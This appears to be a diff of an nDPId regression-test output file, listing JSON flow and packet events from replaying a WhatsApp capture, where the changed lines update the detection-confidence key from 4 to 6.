00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1655031983762,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655031983762,"pkt":"eJS0JASgYDjgxTWgCABFAAA8wNRAAD8GQW3AqAJkszzDMZyUFGb3fC5VAAAAAKAC\/\/8sUAAAAgQFtAQCCAo3N9QvAAAAAAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1655031983792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655031983792,"pkt":"eJS0JASgYDjgxTWgCABFAAA0wNVAAD8GQXTAqAJkszzDMZyUFGb3fC5W\/Bdho4AQAIAA5AAAAQEICjc31GXWXSVb"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1655031983812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655031983812,"pkt":"eJS0JASgYDjgxTWgCABFAAA4wNZAAD8GQW\/AqAJkszzDMZyUFGb3fC5W\/Bdho4AYAIC7fwAAAQEICjc31HjWXSVbRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655031983762,"flow_last_seen":1655031983846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655031983846,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40084,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655031983762,"flow_last_seen":1655031983846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655031983846,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40084,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655032256845,"flow_last_seen":1655032256845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655032256845,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42272,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1655032256845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655032256845,"pkt":"eJS0JASgYDjgxTWgCABFAAA8\/WJAAD8GBN\/AqAJkszzDMaUgFGax9BloAAAAAKAC\/\/9G8wAAAgQFtAQCCApGZfxIAAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1655032256875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655032256875,"pkt":"eJS0JASgYDjgxTWgCABFAAA0\/WNAAD8GBObAqAJkszzDMaUgFGax9BlpNUwtP4AQAVdnOAAAAQEICkZl\/HKo3wGM"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1655032257086,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655032257086,"pkt":"eJS0JASgYDjgxTWgCABFAAA4\/WRAAD8GBOHAqAJkszzDMaUgFGax9BlpNUwtP4AYAVchFQAAAQEICkZl\/USo3wGMRUQAAQ=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655032256845,"flow_last_seen":1655032257115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655032257115,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42272,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655032256845,"flow_last_seen":1655032257115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655032257115,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42272,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":26,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":25,"total-skipped-flows":0,"total-l4-payload-len":2151,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":3,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":19,"global_ts_msec":1655032857220} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655032857220,"flow_last_seen":1655032857220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655032857220,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42436,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1655032857220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655032857220,"pkt":"eJS0JASgYDjgxTWgCABFAAA8wH9AAD8GQcLAqAJkszzDMaXEFGbLQu4oAAAAAKAC\/\/8vAgAAAgQFtAQCCApGbyV9AAAAAAEDAwg="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1655032857250,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655032857250,"pkt":"eJS0JASgYDjgxTWgCABFAAA0wIBAAD8GQcnAqAJkszzDMaXEFGbLQu4pkG\/w9oAQAVfp3wAAAQEICkZvJafXThmp"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1655032857827,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655032857827,"pkt":"eJS0JASgYDjgxTWgCABFAAA4wIFAAD8GQcTAqAJkszzDMaXEFGbLQu4pkG\/w9oAYAVeiWAAAAQEICkZvJ93XThmpRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655032857220,"flow_last_seen":1655032857857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655032857857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42436,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655032857220,"flow_last_seen":1655032857857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655032857857,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42436,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":34,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":34,"packets-processed":33,"total-skipped-flows":0,"total-l4-payload-len":2468,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":25,"global_ts_msec":1655033482376} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655033482376,"flow_last_seen":1655033482376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655033482376,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40178,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1655033482376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655033482376,"pkt":"eJS0JASgYDjgxTWgCABFAAA8gelAAD8GgFjAqAJkszzDMZzyFGaeLx0YAAAAAKAC\/\/83kgAAAgQFtAQCCAo3PDMVAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1655033482414,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655033482414,"pkt":"eJS0JASgYDjgxTWgCABFAAA0gepAAD8GgF\/AqAJkszzDMZzyFGaeLx0Zpn\/BEoAQAIBtAgAAAQEICjc8MzXDJ83z"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1655033482468,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655033482468,"pkt":"eJS0JASgYDjgxTWgCABFAAA4getAAD8GgFrAqAJkszzDMZzyFGaeLx0Zpn\/BEoAYAIAneAAAAQEICjc8M27DJ83zRUQAAQ=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655033482376,"flow_last_seen":1655033482498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655033482498,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40178,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655033482376,"flow_last_seen":1655033482498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655033482498,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40178,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655033797377,"flow_last_seen":1655033797377,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655033797377,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42646,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1655033797377,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655033797377,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nO5AAD8GZVPAqAJkszzDMaaWFGa281iWAAAAAKAC\/\/9\/gAAAAgQFtAQCCApGfX4AAAAAAAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1655033797408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655033797408,"pkt":"eJS0JASgYDjgxTWgCABFAAA0nO9AAD8GZVrAqAJkszzDMaaWFGa281iXgu6c24AQAVcrDQAAAQEICkZ9fiWj+b3w"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1655033797436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655033797436,"pkt":"eJS0JASgYDjgxTWgCABFAAA4nPBAAD8GZVXAqAJkszzDMaaWFGa281iXgu6c24AYAVfloAAAAQEICkZ9fkCj+b3wRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655033797377,"flow_last_seen":1655033797468,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655033797468,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42646,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655033797377,"flow_last_seen":1655033797468,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655033797468,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42646,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655033850395,"flow_last_seen":1655033850395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655033850395,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40204,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1655033850395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655033850395,"pkt":"eJS0JASgYDjgxTWgCABFAAA88ONAAD8GEV7AqAJkszzDMZ0MFGa\/1NfCAAAAAKAC\/\/\/I8wAAAgQFtAQCCAo3PcVIAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1655033850502,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655033850502,"pkt":"eJS0JASgYDjgxTWgCABFAAA08ORAAD8GEWXAqAJkszzDMZ0MFGa\/1NfDoiLOPYAQAIA8iQAAAQEICjc9xe1pw9\/f"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1655033850502,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655033850502,"pkt":"eJS0JASgYDjgxTWgCABFAAA48OVAAD8GEWDAqAJkszzDMZ0MFGa\/1NfDoiLOPYAYAID3LAAAAQEICjc9xfhpw9\/fRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655033850395,"flow_last_seen":1655033850680,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655033850680,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40204,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655033850395,"flow_last_seen":1655033850680,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655033850680,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40204,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":58,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":58,"packets-processed":57,"total-skipped-flows":0,"total-l4-payload-len":3413,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":7,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":41,"global_ts_msec":1655034332550} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655034332550,"flow_last_seen":1655034332550,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655034332550,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45932,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1655034332550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655034332550,"pkt":"eJS0JASgYDjgxTWgCABFAAA8s3tAAD8GTsbAqAJkszzDMbNsFGaY2PgHAAAAAKAC\/\/+CVAAAAgQFtAQCCArFiW3yAAAAAAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1655034332580,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655034332580,"pkt":"eJS0JASgYDjgxTWgCABFAAA0s3xAAD8GTs3AqAJkszzDMbNsFGaY2PgILoO694AQAKylowAAAQEICsWJbhFxU6\/V"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1655034332651,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655034332651,"pkt":"eJS0JASgYDjgxTWgCABFAAA4s31AAD8GTsjAqAJkszzDMbNsFGaY2PgILoO694AYAKxgDAAAAQEICsWJbldxU6\/VRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655034332550,"flow_last_seen":1655034332681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1655034332681,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45932,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655034332550,"flow_last_seen":1655034332681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1655034332681,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45932,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":66,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":66,"packets-processed":65,"total-skipped-flows":0,"total-l4-payload-len":3741,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":8,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1655036863658} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655036863658,"flow_last_seen":1655036863658,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655036863658,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40954,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1655036863658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655036863658,"pkt":"eJS0JASgYDjgxTWgCABFAAA8VU1AAD8GrPTAqAJkszzDMZ\/6FGZJAAaOAAAAAKAC\/\/\/gngAAAgQFtAQCCAo3avKLAAAAAAEDAwk="} 